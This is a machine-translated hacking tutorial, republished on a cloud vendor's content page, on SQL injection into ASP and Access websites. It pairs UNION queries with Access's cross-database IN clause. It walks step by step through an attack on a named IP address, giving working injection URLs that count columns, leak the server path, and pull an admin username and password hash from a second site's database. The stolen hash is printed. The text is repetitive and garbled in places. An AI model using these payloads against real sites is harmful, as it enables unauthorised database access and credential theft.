Cross-database query of mdb files in Access

Source: Internet
Author: User
Tags mysql injection perl script
You still remember mssql's cross-database query. In fact, cross queries between two data items can be implemented in access. Next I will introduce the cross-database query of access. First, let's take a look at how to query mdb files in access. We can create an empty database to query the database D: daosdbdaidalos. mdb.

You still remember mssql's cross-database query. In fact, cross queries between two data items can be implemented in access. Next I will introduce the cross-database query of access. First, let's take a look at how to query mdb files in access. We can create an empty database to query the database D: \ daos \ db \ daidalos. mdb.

We still remember that mssql's cross-Database QueryIn fact, it can also be used in access. ImplementationCrossover between two data items Query. Next I will introduce the cross-Database access Query.

First, let's see how access ImplementationFor mdb FileProceed QueryYou can create an empty database to view the admin table in database D: \ daos \ db \ daidalos. mdb. Query, The SQL statement is:

SELECT * from admin in "D: \ daos \ db \ daidalos. mdb"





QueryThen, the contents in the admin table of the target database are returned:





In actual asp injection, two select statements are required at the same time. If you are familiar with php + mysql injection, it is easy to think of union Query, We can still use in access, using union QueryAnother advantage is that you should not guess the data one by one, the data in the field can be exposed directly like mysql + php injection (the specific mix has already written a detailed article ). As shown above ImplementationCross-Database QueryThe following two conditions are required:

Use union QueryYou must know the number of fields in the table in the previous select statement.

You must know the location of the target database, absolute path.

Condition 1 can be manually guessed based on the error message, or automatically Implementation.

Condition 2 is difficult, but we can use the "access brute-force library" ImplementationSome people will say that since we can know the data location, we don't need to download the data directly. In fact, the current database generally prevents downloading, and some do not have the web directory at all.

The first level of the fourth round of the anti-DDoS pro lab is the two asp + access download systems. One is the rain point Download System and the other is the stolen handsome Download System. After testing, the hacker downloading system can expose the database, but does not allow the download. It seems that there is no injection, and the downloading system in the rain is full of loopholes. The database can be violent and can be directly downloaded, injection is also possible. However, the background of the rain point is very simple and there is nothing to use. Our goal is to get the password of the background of the hacker. I will show it to you, cross-database use of the injection points of the rain point system QueryAnd get the hacker's background password:

We know that the list. asp of the rain point system can be injected. We first need to get the number of data table fields in the union, and submit:

Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 201% 20 from % 20 userinfo

Return Value:

Microsoft JET Database Engine error '80040e14'

In Union QueryThe two selected data tables or QueryThe number of columns in does not match.

/Yddown/list. asp, row 51

The field is incorrect. I wrote a perl script to automatically guess the field (see the code below)

When we submit:

Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 3%, 20 from % 20 userinfo

No error returned:





Haha! We have obtained the number of fields, and we can get my position in Field 1, which shows us Query.

Now we are still at the database location where the hacker is handsome. Let's simply submit the following:

Http: // 219.237.81.46/dsdown % 5cregs. asp

Successful return path:

Microsoft JET Database Engine error '20140901'

'D: \ 111 \ db \ kljdsld. asa' is not a valid path. Check whether the path name is correctly spelled and whether it is connected. FileStorage server.

/Dsdown/db/user. asp, Row 6

(Note: The obtained path is not necessarily "complete". The actual path is D: \ 111 \ dsdown \ db \ kljdsld. asa)

Next we construct a url across databases as follows:

Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 20 admin, 3,2% 20 from % 20 admin % 20in % 20 "D: \ 111 \ dsdown \ db \ kljdsld. asa "% 20 where % 20id = 1

The preceding statement is, union QueryData D: \ 111 \ db \ kljdsld. asa:





The username is admin, and then the brute-force password is obtained:

Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 20pws, 3,2% 20 from % 20 admin % 20in % 20 "D: \ 111 \ dsdown \ db \ kljdsld. asa "% 20 where % 20id = 1





Get a 32-bit md5 encrypted hash: 77e6cbb3f9468eadb655ae6826357922. QuerySuccess. Here I just want to demonstrate the cross-Database Query:).

Summary

This article mainly introduces two very useful methods. 1st we don't have to guess each character at the top of asp injection, so it is very troublesome to have Chinese characters, directly Using union instead of data can directly expose the data, regardless of whether it is a Chinese character or a special character, can be put in place in one step, 2nd is a cross-database, the use is very flexible, can let you during penetration, there are unexpected gains.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.